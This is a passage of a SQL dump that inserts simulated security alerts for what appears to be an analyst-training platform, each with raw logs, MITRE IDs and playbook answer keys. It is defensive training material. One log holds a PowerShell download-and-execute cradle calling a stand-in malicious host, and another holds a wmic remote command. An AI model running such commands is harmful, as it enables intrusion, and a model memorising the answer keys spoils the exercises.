credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was confirmed to be a phishing attempt due to the malicious link and spoofed domain, matching known phishing patterns.\"}', 'Advanced', 'EDR', 1, 0, 'GOVERNMENT');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(304, 'Spear Phishing Email Detected', 'medium', 'Email Gateway', 'A spear phishing email from a malicious source, disguised as a communication from a trusted partner, was detected targeting an employee in the finance department. The email contained a malicious attachment and a suspicious link.', 'Phishing', 'T1566.002', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"email_id\":\"1234567890\",\"from\":\"finance.partner@maliciousdomain.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Urgent: Q3 Financial Report\",\"attachment\":\"Q3_Report.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://maliciousdomain.com/securelogin\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\"}', '2026-01-02 04:27:59', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing URL targeting credentials\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(305, 'Suspicious PowerShell Execution', 'high', 'EDR', 'A PowerShell script was executed on the compromised system. This script is suspected to be used to establish a foothold and download additional malicious payloads. The execution follows a successful phishing attempt that targeted user john.doe.', 'Execution', 'T1059.001', 1, 'new', 34, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4688,\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_script.ps1\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This hash is associated with a known malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious script naming conventions.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account that was targeted during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(306, 'Persistence Mechanism Established', 'high', 'Endpoint Logs', 'The attacker has established a persistence mechanism on the compromised system by creating a scheduled task and modifying registry keys. This ensures the malicious software remains active and reinitiates upon system restart.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_type\":\"registry and scheduled task modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"affected_user\":\"john.doe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"scheduled_task\":{\"task_name\":\"SystemUpdater\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\taskhost.exe\",\"creation_time\":\"2023-10-12T14:40:00Z\"},\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines as malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"taskhost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Mimics legitimate Windows process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(307, 'Unauthorized Lateral Movement Detected', 'high', 'Network Logs', 'The attacker used stolen credentials to move laterally across the network, probing for systems hosting geological data repositories. The lateral movement was detected from internal IP 192.168.1.15 to 192.168.1.20 using compromised credentials of user \'j.doe\'.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"192.168.1.20\",\"username\":\"j.doe\",\"action\":\"Lateral Movement\",\"result\":\"Success\",\"external_ip\":\"203.0.113.45\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\geodata\\\\confidential_report.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal system hosting valuable data.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this file hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(308, 'Data Exfiltration Attempt', 'high', 'Firewall', 'An attempt was detected to transfer sensitive geological data out of the corporate network. The attacker, believed to be APT34, is using encrypted channels to exfiltrate data to a command and control server.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"src_ip\":\"10.1.2.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_sent\":1048576,\"bytes_received\":512,\"filename\":\"geo_data_export.zip\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"username\":\"jdoe\",\"url\":\"https://malicious-c2.com/exfil\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT34 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious file hash associated with data exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2.com/exfil\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"URL associated with APT34\'s exfiltration operations\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"geo_data_export.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file likely to contain geological data\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(313, 'Suspicious PowerShell Script Execution Detected', 'high', 'Endpoint', 'A PowerShell script was executed on a critical server with unusual parameters that could be indicative of a malicious payload or reconnaissance activity.', 'Process Execution', 'T1059.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-14T11:35:45Z\",\"hostname\":\"finance-server-03\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.50\\\\share\\\\suspicious.ps1\",\"file_hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"parent_process\":\"explorer.exe\",\"pid\":4567,\"ppid\":4123,\"integrity_level\":\"High\",\"network_connections\":\"None\",\"additional_info\":{\"script_block_logging\":\"Enabled\",\"module_logging\":\"Enabled\"}}', '2026-01-02 15:31:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"152.82.254.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 152.82.254.41 reported 141 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(314, 'Port Scanning Detected from External Source', 'medium', 'Network', 'Multiple connection attempts on increasing port numbers were detected from an IP address not previously seen, suggesting a potential reconnaissance attempt.', 'Network Anomaly', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2023-10-14T13:47:08Z\",\"src_ip\":\"185.32.184.76\",\"src_port\":4723,\"dest_ip\":\"172.16.0.10\",\"dest_ports\":[22,23,80,443,8080],\"protocol\":\"TCP\",\"packet_count\":50,\"byte_count\":11000,\"user_agent\":\"Mozilla/5.0\",\"geo_location\":{\"country\":\"Germany\",\"city\":\"Frankfurt\"},\"additional_info\":{\"as_number\":12345,\"as_org\":\"Example ISP\"}}', '2026-01-02 13:35:26', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"221.191.155.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 221.191.155.57 reported 235 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NDR', 1, 0, 'OT_ICS'),
(315, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'WORKSTATION-01\'. The process has been linked to a known malware campaign targeting enterprise environments.', 'Malware', 'T1059', 1, 'Closed', 54, '{\"timestamp\":\"2026-01-02T10:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.2\",\"hostname\":\"WORKSTATION-01\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\jane.doe\\\\malware.exe\"}', '2026-01-02 11:44:27', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as part of a well-known malware campaign.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is part of the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file indicates a real threat requiring immediate containment and investigation.\"}', 'Intermediate', 'NULL', 1, 0, NULL),
(316, 'Phishing Attempt Detected via Malicious Email', 'medium', 'Proofpoint', 'An email containing a malicious URL was received by user \'john.smith\'. The URL is associated with credential harvesting attacks.', 'Phishing', 'T1566', 1, 'investigating', 34, '{\"timestamp\":\"2026-01-02T08:47:30Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@fakebank.com\",\"username\":\"john.smith\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-02 14:22:02', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address is associated with recent phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing sites targeting user credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in an email suggests a phishing attack aimed at harvesting credentials.\"}', 'Beginner', 'NULL', 1, 0, NULL),
(317, 'Suspicious Email Detected with Potential Phishing URL', 'medium', 'Proofpoint', 'An email was received from a suspicious sender with a URL known for phishing activities. The email appears to be a spoofed message attempting to trick users into clicking the malicious link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-02T08:34:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"noreply@alerting-service.com\",\"domain\":\"alerting-service.com\",\"url\":\"http://malicious-phishing-link.com\",\"username\":\"john.doe\",\"hostname\":\"johns-pc\"}', '2026-01-02 11:43:28', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 23 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"alerting-service.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-phishing-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with ongoing phishing campaign\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known malicious URL and reports of phishing from the IP suggest this is a true positive.\"}', 'Beginner', 'EDR', 1, 0, 'GOVERNMENT'),
(318, 'Excessive Login Failures from Known Internal Host', 'low', 'Wazuh', 'Multiple failed login attempts were detected from an internal IP address. The activity was flagged due to a high number of failures, but the source is an internal, known host.', 'Brute Force', 'T1110', 0, 'Closed', 54, '{\"timestamp\":\"2026-01-02T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-server\",\"failed_attempts\":15}', '2026-01-02 19:25:21', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal network address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"clean\",\"details\":\"Commonly used internal admin account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originate from an internal IP address, indicating a potential misconfiguration or user error rather than a malicious attempt.\"}', 'Beginner', 'NULL', 1, 0, NULL),
(319, 'Suspicious Email Detected', 'high', 'Email Gateway', 'APT10 begins the attack by sending spear-phishing emails to key employees of TechGlobal Inc., enticing them to click on a malicious link disguised as a legitimate business document.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"email_id\":\"d3f4b5c6-7e89-4abc-de12-34567890fghj\",\"sender\":\"attacker@maliciousdomain.com\",\"recipient\":\"jane.doe@techglobal.com\",\"subject\":\"Important Business Document\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"url\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"smtp_server\":\"smtp.techglobal.com\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address involved in multiple phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Inspection Service\",\"verdict\":\"malicious\",\"details\":\"URL is associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Name Patterns\",\"verdict\":\"suspicious\",\"details\":\"Common filename used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(320, 'Unauthorized Application Execution', 'high', 'EDR', 'Following successful credential harvesting, the attacker uses the compromised accounts to execute malware on the target network, enabling remote access and further exploitation.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:28:32Z\",\"event_id\":\"4624\",\"computer_name\":\"workstation-22.corp.local\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.57\",\"destination_ip\":\"10.0.0.45\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"malicious_script.ps1\",\"action\":\"Create Process\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(321, 'Persistence Mechanism Installed', 'high', 'Endpoint Security Logs', 'APT10 installed a persistence mechanism via registry modifications and scheduled tasks on the endpoint, ensuring continued access to the compromised systems. Detection of suspicious registry changes and scheduled tasks was noted.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:37:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"filename\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"RegistryModification\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"process_name\":\"regedit.exe\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"is_critical\":true,\"osint_result\":{\"source\":\"EndpointSecurity\",\"verdict\":\"malicious\",\"details\":\"Malicious scheduled task linked to persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(322, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With a foothold established, the attacker moves laterally within the network, using legitimate administrative tools to avoid detection while searching for valuable data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:25:36Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"192.168.1.150\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"admin_jdoe\",\"used_tool\":\"wmic\",\"command\":\"wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"detected_protocol\":\"SMB\",\"log_type\":\"network_traffic\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of potential compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for lateral 